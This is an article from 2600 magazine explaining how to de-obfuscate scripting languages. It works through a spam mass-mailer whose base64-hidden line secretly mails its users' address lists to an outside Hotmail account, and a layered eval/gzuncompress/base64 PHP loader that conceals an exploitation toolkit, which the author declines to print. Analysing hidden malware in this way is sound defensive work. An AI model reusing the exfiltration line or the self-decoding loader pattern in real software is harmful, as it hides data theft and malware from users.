De-Obfuscating Scripting Languages

by Cliff

Imagine you're a lame web designer...

How do you protect your precious HTML, as if nobody's ever seen HTML before?  Imagine you're adding some kind of validation to a web page, but you don't want the validation algorithm to be publicly visible.  Or you're trying to hide your malicious code in an otherwise innocuous page?

You use obfuscation.

Obfuscation doesn't make code impossible to read, it just makes it a pain in the ass, and not worth bothering with for the average user.  The great thing with scripting languages is that they are interpreted plaintext.  In order for the script to run, it has to be human-readable at some stage - all you need to do is to de-obfuscate it, and read what the author didn't want you to read.  The more someone doesn't want me to read something, the more curious I become!

Common scripting languages include PHP, VBScript, and JavaScript.

Each has their own syntax and use, but have lots of common programming constructs.  For instance, PHP runs on the server, but not on a browser, JavaScript can run on either, and VBScript is most suited to server-side execution.  The one instruction every code obfuscator uses is eval(), which works just about the same in each of these languages.

The eval("string") will execute the code contained in the string variable string, whatever it may be.  That code may be in cleartext, or it may be a short program, to hide the cleartext using other functions which vary with the scripting language used.

Here's a simple, real-life sample I took from a PHP script.

This PHP script was called the "Yoga0400 Mass Mailer."  It was forwarded to me by someone who found a copy on their honeypot.  It was a generic PHP HTML interface for the box's own SMTP server, and it looks as if it was handed out freely to spammers to use as a service to humanity.  Some service - it contains a line:

echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));

Which made me curious - what did it do that someone who gives away a spamming script might want to keep a secret?

This was an easy one, and feel free to play along at home...  I looked up PHP's base64_decode() function, and thanks to the excellent php-functions.com and similar sites, I was able to decode the string in a blink.

Simply copy and paste the string: bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7

Into the base64_decode() box and hit "Submit".

You should see the result:

mail("grofi_hack@hotmail.com", $subj98, $msg, $message, $ra44);

This secret script would take a copy of all the email addresses the spammer was using, and send it to grofi_hack@hotmail.com - grofi_hack was using this giveaway tool to build up his own spam lists!

No honor amongst thieves.  For what it's worth, I believe Hotmail killed that address off a while ago.  It's very hard to shed a tear for someone stealing a spam list from another spammer; either way it's the innocent inboxes that get hosed!

This was an example of the base64_decode() function in PHP being used to obfuscate cleartext code.

Another commonly used function is gzuncompress(), another layer of trying to hide what happens beneath the covers.

For instance, a very innocent looking three lines that I've snipped heavily here - one of those three lines is very, very, very long indeed - would have filled several pages of 2600 for just that expression.

It's the obfuscated bit:

// This file is protected by copyright law and provided under license.
// Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=42896;
eval(gzuncompress(base64_decode('eNplj8duwkAYhf-SNIP ABOUT 300 CHARS-T47xDRfgD5Al8g')));
return;

GYQYAfsKI0EW/cBaMtxrEmJqy6xkdCvAsLRv6IViHHeQFVmVAsp-SNIP ABOUT 40 KB OF SIMILAR STUFF-7G/T/ntYYFI==

The first line is easy - someone prohibiting me from seeing what code they want to run on my computer?  I ignored it, so sue me.

Next we have a few variable declarations in a single line.  Unkindly, the person obfuscating the code used a real mix of characters here - Courier New renders them all the same (see above), so let's try a different font.

Wingdings shows us what's going on here rather well: 👓🏳🏳🏳📁🏳📁🏳📁📁

That seeming $OOO0O0O00 is actually a mix of O's and zeroes, slippery.

Of course, the second and third variable are different mixes of O's and zeroes.  This is clearly going to be a battle, lucky I'm so obstinate!  I did a bit of renaming myself:

//$OOO0O0O00=__FILE__;
$file=__FILE__;
//$O00O00O0__LINE__;
$line=47;
//$OO00O0000=42896;
$offset=42896;

I figured $file, $line, and $offset would be more useful names initially to get me rolling, and so used search and replace, and not for the last time.

Particularly neat was the use of __FILE___ and __LINE__, which meant adapting the code would damage it, hence the hard-coded value for $line.

I worked out why it was so important, and what the line number would be once I'd tidied the code up.  This was a very clever obfuscation!

Continuing, I tidied the code a bit:

$a1='eNplj8duwkAYhF/G0u4qRlmI44AsH+idpbdL5PK7GBu7LsDTBxREhKKZ02jmk0ZilFJ2E9WdOIEIS4yx30BG3EREKzw/AFwqSexevJs4LqQCS8+pXKYVhWj/YoXWVKLdiI+l7l6zyIrDhIMQ2DQEqMq3DVZsAxYpTzl2OBj2C6JKiYzaUQr8EmfF0Zv3dsPJhq2WdaNhNq2W3XG6bt8fHEbBOJwms9NCrPPteX+l5cqH8ql+VWtv7zq5Ub3RbLU73V5/MByNJ2w6my+Wq/Vmu9sbpmWD43rA+4RiEUZycuEizvDhfXhiIEKJBbgT47xDRfgD5Al8g'
$a2=base64_decode($a1);
$a3=gzuncompress($a2);

Next I did the base64_decode() then using using a 30-day trial of a PHP debugger, did the gzuncompress() on the result.

What I got was:

//eval sequence $a3
$O000O0O00)=fopen($OOO0O0O00, 'rb');
while(--$O00O00O00) fgets($O000O0O00, 1024);
fgets($O000O0O00, 4096);
$OO00O00O0=gzuncompress(base64_decode(strtr(fread($O000O0O00, 480), 'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OO00O00O0);

Cheeky!  More of the O's and zeroes.  Reformatted and renamed...

// next lines address the data lines
$stream1=fopen($file, 'rb');
while(--$line)fgets($stream1,1024);
fgets($stream1,4096);
$b1=fread($stream1,480);
//$b1='W/-LOTS OF SNIPPAGE-//8lsR3kgX3JRrh9Em;
$b2=strtr($b1,'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$b3=base64_decode($b2);
$b4=gzuncompress($b3);

So the original third line comes into play - the 40 kB is all data for the routine obfuscated in the second line.

The script opens its own file, reads the data line, uses strtr() to translate characters, then performs another base64_decode() and gzuncompress() on the resulting data.

Interestingly, here we see evidence that this has been obfuscated with a tool of some sort - the strtr() string starts Enteryou which is quite possibly the start of "Enter your seeding string here" or some similar default value.

Not that anyone but a madman would roll this stuff by hand, of course.  Or reverse engineer it...

By now, I was feeling mightily proud of myself.  I was clearly getting closer.

$b4 contained another blooming mash of O's and zeroes, base64_decode(), gzuncompress(), fread(), strtr(), and a new one for me, ereg_replace(), which when tidied gave us:

$c2=fread($stream1,$offset);
$c3=strtr($c2, 'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpOoQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$c4=base64_decode($c3);
$c5=gzuncompress($c4);
//$c1=ereg_replace('__FILE__',"'".$file."'",$c5;
$c6=strlen($c5);

Now I wondered if I was going in circles?  Earlier I had, for 90 minutes.

The code is so cleverly recursive that if you miscount a position, etc., you literally end up in a loop.  Utterly brilliant, but that meant the code had to succumb to me or kill me trying.

print ($c6);
print ($c5); //dump the secret script
fclose($stream1);
return;

I have to admit, my worksheet was getting crazily messy by now, and some of my workings may well appear to be missing steps - this article is about the principle though, not this script.

But this was it, I now had the final script, hidden deep inside some crazy obfuscated code.

The first thing AVG did when I tried to save the file was to panic.  I knew I'd hit paydirt.  And indeed it was an exploitation toolkit designed to run on UNIX and Linux variants, very cute indeed.

I'm afraid I won't list the actual code here.  It's not relevant and it's not nice, and frankly I've lost a chunk of it.

But this journey is typical of the work you have to put into seemingly impossible de-obfuscation of scripting languages.

They're usually obfuscated with software tools, they're usually several layers deep, and they try every kind of diversion they can to throw you off the scent, into loops, etc.  I learned more about the internals of PHP de-obfuscating this code than any tutorial has ever taught me.

There are other techniques in use to try to protect scripts - you might find scripts referenced in a client-side include, for instance, in the hope that as they don't appear in your browser, you can't see the script.

Try your browser cache for these scripts.  JavaScript has its share of obfuscated code too - again you'll see string replacements, offsets, loops within loops, obscure programming constructs, anything to throw you off the scent - but remember, it will always give you a cleartext version of the script in the end, otherwise the engine couldn't run it.

The best thing you can do from here is to find some obfuscated code, and have a go yourself - it's quite rewarding when you finally see what someone has worked so hard to stop you from seeing.

Often, it's quite mundane - some idiot has thought you really want to copy his crappy alert('Page Protected by xxx') script - but sometimes you hit the weird and wonderful stuff, and it's quite informative.

Well obfuscated code will not give up any secrets in a regular debugger either - taking it out of context can cause problems, or executing a whole line at a time will prevent you from stepping through every iteration of an obfuscation.

You need to pull the code to pieces to see what happens at the heart.  Work methodically, evaluate terms one at a time, rename stupidly named variables, but be sensitive to any environment variables like __LINE__ which can trip you up.

Each step reveals more puzzles to solve, but in the end you can discover some of the guilty secrets of the web!  It's a good hobby.

Maybe post some of your steps, discoveries, and gotchas to 2600 too, so we can all learn a bit more too.

Thank you for your attention and interest.  I hope this has inspired you somehow.

Return to $2600 Index